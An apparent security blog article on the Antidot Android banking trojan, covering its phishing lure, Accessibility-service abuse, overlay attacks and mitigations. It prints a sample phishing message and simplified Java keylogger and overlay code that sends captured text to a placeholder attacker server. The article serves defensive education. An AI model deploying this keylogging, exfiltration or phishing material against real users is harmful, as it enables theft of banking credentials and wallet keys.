Empowering Users Against Cyber Threats & Enhancing Digital Security
Antidot: The Android Malware Disguised as a Google Play Update
A new Android banking trojan named Antidot has emerged, spreading through phishing campaigns and masquerading as a Google Play update. This malware employs advanced obfuscation techniques to evade detection and performs activities such as stealing banking credentials, cryptocurrency wallet details, and login information from messaging and email applications.
This article explores Antidot’s attack techniques, its malicious code structure, and countermeasures to prevent infection.
Antidot’s Attack Chain
1. Infection via Phishing
The malware is distributed through phishing messages containing a fake update link that prompts users to install a security update for Google Play.
Example of a Phishing Message:
[Google Security Update]
Your device is vulnerable! Install the latest Google Play update to protect your account:
🔗 https://secure-update-googleplay[.]com
Failure to install this update may result in account suspension.Once the user clicks on the malicious link, they are redirected to a website that delivers the malware APK, disguised as a legitimate update.
2. Abuse of Android Accessibility Services
After installation, Antidot abuses Android Accessibility Services to gain control over the device, allowing it to:
- Perform overlay attacks
- Capture keystrokes (keylogging)
- Grant itself additional permissions
Malicious Code to Enable Accessibility Services Exploitation:
public class AccessibilityExploit extends AccessibilityService {
@Override
public void onAccessibilityEvent(AccessibilityEvent event) {
String capturedText = event.getText().toString();
Log.d("KeyLogger", "Captured: " + capturedText);
sendDataToServer(capturedText);
}
private void sendDataToServer(String data) {
new Thread(() -> {
try {
URL url = new URL("https://attacker-server[.]com/steal");
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("POST");
conn.setDoOutput(true);
OutputStream os = conn.getOutputStream();
os.write(data.getBytes());
os.close();
} catch (Exception e) {
e.printStackTrace();
}
}).start();
}
@Override
public void onInterrupt() {}
}This code snippet captures user input from text fields and transmits it to a command-and-control (C2) server.
3. Overlay Attacks
Antidot uses overlay attacks to steal banking credentials by displaying a fake login page over legitimate banking apps. Users unknowingly enter their credentials, which are then sent to the attacker.
Example Code for Overlay Attack:
WindowManager.LayoutParams params = new WindowManager.LayoutParams(
WindowManager.LayoutParams.MATCH_PARENT,
WindowManager.LayoutParams.MATCH_PARENT,
WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE,
PixelFormat.TRANSLUCENT
);
View fakeLoginView = LayoutInflater.from(context).inflate(R.layout.fake_login, null);
windowManager.addView(fakeLoginView, params);This malicious code overlays a fake login screen when a user opens a targeted banking app.
4. Keylogging for Cryptocurrency Theft
Many cryptocurrency wallet apps use PIN codes or private keys for authentication. Antidot captures this data via keylogging.
Example Code for Keylogging Cryptocurrency Transactions:
public class Keylogger extends AccessibilityService {
@Override
public void onAccessibilityEvent(AccessibilityEvent event) {
if (event.getEventType() == AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED) {
String typedText = event.getText().toString();
sendToC2(typedText);
}
}
private void sendToC2(String data) {
RequestBody body = RequestBody.create(data, MediaType.parse("text/plain"));
new OkHttpClient().newCall(new Request.Builder()
.url("https://attacker-server[.]com/crypto").post(body).build()).execute();
}
}This code logs text input changes and sends the collected private keys or credentials to the attacker’s server.
Evading Detection
Antidot employs multiple evasion techniques, including:
- Obfuscation: Using tools like ProGuard to make code analysis difficult.
- Encryption: Encrypting stolen data before transmission.
- Code Injection: Injecting malicious code dynamically to bypass signature-based detection.
Example of Simple Obfuscation:
public String decryptData(String encryptedData) {
return new String(Base64.decode(encryptedData, Base64.DEFAULT));
}This prevents static analysis from revealing the true nature of the stolen data.
Mitigation Strategies
To protect against Antidot and similar malware, users and organizations should adopt the following security measures:
1. Avoid Sideloading Apps
- Only install apps from Google Play Store and avoid APKs from untrusted sources.
2. Disable Accessibility Access for Untrusted Apps
- Navigate to Settings → Accessibility and disable access for unfamiliar apps.
3. Use Google Play Protect
- Enable Google Play Protect for real-time app scanning.
4. Be Wary of Phishing Messages
- Avoid clicking on links in SMS, emails, or social media messages that prompt downloads.
5. Implement Two-Factor Authentication (2FA)
- Use 2FA apps like Google Authenticator instead of SMS-based authentication.
6. Monitor Device Permissions
- Regularly review app permissions and revoke unnecessary access.
Conclusion
Antidot is a sophisticated Android malware that poses a severe threat to mobile banking and cryptocurrency users. By leveraging phishing, overlay attacks, keylogging, and advanced obfuscation, it effectively steals sensitive information.
Implementing security best practices such as avoiding sideloaded apps, monitoring permissions, and using 2FA can mitigate the risk of infection. Organizations should also educate users about phishing threats to prevent the spread of such malware.
By staying informed and vigilant, users can defend themselves against Antidot and other evolving cyber threats.
Stay safe and keep your Android devices secure!